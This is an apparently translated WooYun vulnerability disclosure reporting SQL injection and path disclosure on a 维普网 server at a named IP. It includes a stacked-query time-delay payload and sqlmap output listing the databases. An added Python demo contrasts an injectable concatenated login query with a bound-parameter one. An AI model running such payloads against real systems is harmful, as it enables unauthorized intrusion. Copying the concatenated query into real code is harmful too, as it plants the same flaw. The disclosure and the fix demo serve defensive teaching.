Vulnerability summary

Bug ID: wooyun-2015-0100819

Title: SQL injection and information disclosure on a 维普网 site

Vendor: cqvip.com

Author: 路人甲

Submitted: 2015-03-12 19:22

Fixed: 2015-03-17 19:24

Disclosed: 2015-03-17 19:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org

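Vulnerability details

Disclosure status:

2015-03-12: Details sent to the vendor; waiting for the vendor to handle them
2015-03-17: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

SQL injection and information disclosure on a 维普网 site

Detailed description:

1# Injection site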

http://119.84.8.90:80//index.asp


Injection details

sqlmap identified the following injection points with a total of 143 HTTP(s) requests:
---
Parameter: username (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: username=tEQa';WAITFOR DELAY '0:0:5'--&password=
---
do you want to exploit this SQL injection? [Y/n] Y
[22:52:25] [INFO] testing Microsoft SQL Server
[22:52:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:52:33] [INFO] confirming Microsoft SQL Server
[22:52:43] [INFO] adjusting time delay to 1 second due to good response times
[22:52:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008


Database information

database management system users password hashes:


current database:    'FMIF_WT'
available databases [7]:
[*] [tempdbQ}\t\x11]
[*] FMIF_WT
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB


2# Database absolute path disclosure

http://119.84.8.90/ip.asp


PATH_TRANSLATED = D:\FPD2012Webroot\FPDSYStem\html\ip.asp

Proof of vulnerability:

current database:    'FMIF_WT'
available databases [7]:
[*] [tempdbQ}\t\x11]
[*] FMIF_WT
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB

Remediation:

Filter input, and delete pages that are not needed.

Copyright notice: when reposting, credit the source 路人甲@乌云
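
The login query built by string concatenation next to the same query with bound parameters, as an added example that is not code from the report or from the affected site. The table schema and function names are assumptions, and SQLite stands in for SQL Server: its Python driver refuses a multi-statement string, so the concatenated form errors out here, whereas the sqlmap output above shows SQL Server executing the stacked statement.

```python
import sqlite3

# Username value taken from the sqlmap payload shown in the report.
PAYLOAD = "tEQa';WAITFOR DELAY '0:0:5'--"

def make_db():
    """Constructed stand-in for the login table; the schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; store a salted hash in practice.
    db.execute("INSERT INTO users VALUES (?, ?)", ("o'brien", "s3cret"))
    return db

def login_concat(db, username, password):
    """'Before' form: request values are pasted into the SQL text."""
    sql = ("SELECT 1 FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_bound(db, username, password):
    """Hardened form: the SQL text is constant, values travel as bound parameters."""
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None

def outcome(fn, username, password):
    """True/False for a login decision, 'sql-error' if the input changed the statement."""
    try:
        return fn(make_db(), username, password)
    except (sqlite3.Error, sqlite3.Warning):
        return "sql-error"

if __name__ == "__main__":
    for fn in (login_concat, login_bound):
        print(fn.__name__,
              "payload ->", outcome(fn, PAYLOAD, ""),
              "| o'brien ->", outcome(fn, "o'brien", "s3cret"))
```

With bound parameters the payload is compared as an ordinary string and the legitimate name containing an apostrophe still logs in, which a quote-stripping filter alone would not allow.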


Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-03-17 19:24

Vendor reply:

Latest status:

None yet